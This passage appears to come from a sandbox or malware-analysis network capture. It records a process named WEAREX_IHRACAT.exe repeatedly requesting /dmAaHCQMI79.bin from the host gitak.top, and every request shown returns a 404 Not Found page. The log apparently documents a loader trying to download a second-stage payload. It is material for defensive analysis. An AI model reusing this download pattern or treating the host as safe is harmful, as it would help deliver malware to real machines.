                        2024-08-29 10:46:37 UTC1369INData Raw: 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e 3b 0a 09 09 09 7d 0a 0a 09
                        Data Ascii: argin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}
                        2024-08-29 10:46:37 UTC907INData Raw: 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20
                        Data Ascii: 15 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0
                        2024-08-29 10:46:37 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        37192.168.11.2049813172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:46:47 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:46:47 UTC681INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:46:47 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 10
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TMZVqUKXFMvt2oMoa48tTQ6wtJGNlsj%2BV0xfFDSCUlN4MdFfYHKliDJuGvqvQdJspkuekEbN9gYQKsm%2FN%2FCX%2B9QswbCJYmma%2FmsNw34w300XjQjpejXGy4rijac%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf594ad5d801b-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:46:47 UTC688INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:46:47 UTC1369INData Raw: 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e
                        Data Ascii: px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn
                        2024-08-29 10:46:47 UTC916INData Raw: 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36
                        Data Ascii: .353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56
                        2024-08-29 10:46:47 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        38192.168.11.2049814172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:46:58 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:46:58 UTC681INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:46:58 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 21
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2e7n4Gsfk9EOUGZg0NvISoDMYY5slzc%2BuhdL6VsJXvTznTMhPQFig3bIc5SBS0xOp1js7%2BZlr7KJ4ZKaUFT830IKXSxADI5iWUIT%2Bjez%2BQ%2BzACGDLjB0CHTtaDQ%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf5d68da12d28-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:46:58 UTC688INData Raw: 62 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b95<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:46:58 UTC1369INData Raw: 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e
                        Data Ascii: px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn
                        2024-08-29 10:46:58 UTC915INData Raw: 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36
                        Data Ascii: .353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56
                        2024-08-29 10:46:58 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                        Data Ascii: 1
                        2024-08-29 10:46:58 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        39192.168.11.2049815172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:47:08 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:47:08 UTC683INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:47:08 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 31
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w9E4enV9EQITKn2RdaDLiP1UOL%2F4RcQ3ckHhSfEealRp%2BJr%2Bs6pVErAmRvyglu6UI7uWTGZlJKq6%2Bw%2BC8BIWPeI2PVbnBWrRNkS%2FQk7vcvV4gitiB6PZ9ZnfYyY%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf6182f97061a-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:47:08 UTC686INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:47:08 UTC1369INData Raw: 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65
                        Data Ascii: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fade
                        2024-08-29 10:47:08 UTC918INData Raw: 2d 32 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68
                        Data Ascii: -2.353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h
                        2024-08-29 10:47:08 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        40192.168.11.2049816172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:47:19 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:47:19 UTC681INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:47:19 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 42
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2FSMgWbpddeq%2FNvt4ouFM%2Ft8tKPaxufufFx4ue7U4Qi3HEA1ervrhFkn94kyx8AstrXZf9lon1y1gr0dWGtL0%2FbsJwUQcZC%2B88dTjCGMFKJYWGooBCqENCmkkGs%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf659ee228293-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:47:19 UTC688INData Raw: 62 39 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b95<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
                        2024-08-29 10:47:19 UTC1369INData Raw: 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 49 6e
                        Data Ascii: px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn
                        2024-08-29 10:47:19 UTC915INData Raw: 2e 33 35 33 20 31 32 2e 34 31 35 20 32 2e 37 31 35 20 31 36 2e 32 35 38 6c 33 34 2e 36 39 39 20 32 36 2e 33 31 63 35 2e 32 30 35 20 33 2e 39 34 37 20 31 32 2e 36 32 31 20 33 2e 30 30 38 20 31 36 2e 36 36 35 2d 32 2e 31 32 32 20 31 37 2e 38 36 34 2d 32 32 2e 36 35 38 20 33 30 2e 31 31 33 2d 33 35 2e 37 39 37 20 35 37 2e 33 30 33 2d 33 35 2e 37 39 37 20 32 30 2e 34 32 39 20 30 20 34 35 2e 36 39 38 20 31 33 2e 31 34 38 20 34 35 2e 36 39 38 20 33 32 2e 39 35 38 20 30 20 31 34 2e 39 37 36 2d 31 32 2e 33 36 33 20 32 32 2e 36 36 37 2d 33 32 2e 35 33 34 20 33 33 2e 39 37 36 43 32 34 37 2e 31 32 38 20 32 33 38 2e 35 32 38 20 32 31 36 20 32 35 34 2e 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36
                        Data Ascii: .353 12.415 2.715 16.258l34.699 26.31c5.205 3.947 12.621 3.008 16.665-2.122 17.864-22.658 30.113-35.797 57.303-35.797 20.429 0 45.698 13.148 45.698 32.958 0 14.976-12.363 22.667-32.534 33.976C247.128 238.528 216 254.941 216 296v4c0 6.627 5.373 12 12 12h56
                        2024-08-29 10:47:19 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                        Data Ascii: 1
                        2024-08-29 10:47:19 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        41192.168.11.2049817172.67.207.2194436300C:\Users\user\Desktop\WEAREX_IHRACAT.exe
                        TimestampBytes transferredDirectionData
                        2024-08-29 10:47:29 UTC169OUTGET /dmAaHCQMI79.bin HTTP/1.1
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                        Host: gitak.top
                        Cache-Control: no-cache
                        2024-08-29 10:47:29 UTC681INHTTP/1.1 404 Not Found
                        Date: Thu, 29 Aug 2024 10:47:29 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Last-Modified: Tue, 27 Aug 2024 00:54:25 GMT
                        Cache-Control: max-age=14400
                        CF-Cache-Status: HIT
                        Age: 52
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WFdsMkrc8RRA2jzkju2Dw8YfkBOYChY%2BEGc3nHm3kIXPFWw9F3UVUDtLhDBvQbwh6Wg7aerf%2FHvzGIPhbFjr8q%2BHOzwBdSezZB6%2B%2FdYhD7tu22gnwnrrCpoRlbg%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8babf69bfe628236-IAD
                        alt-svc: h3=":443"; ma=86400
                        2024-08-29 10:47:29 UTC688INData Raw: 62 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f
                        Data Ascii: b96<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;co
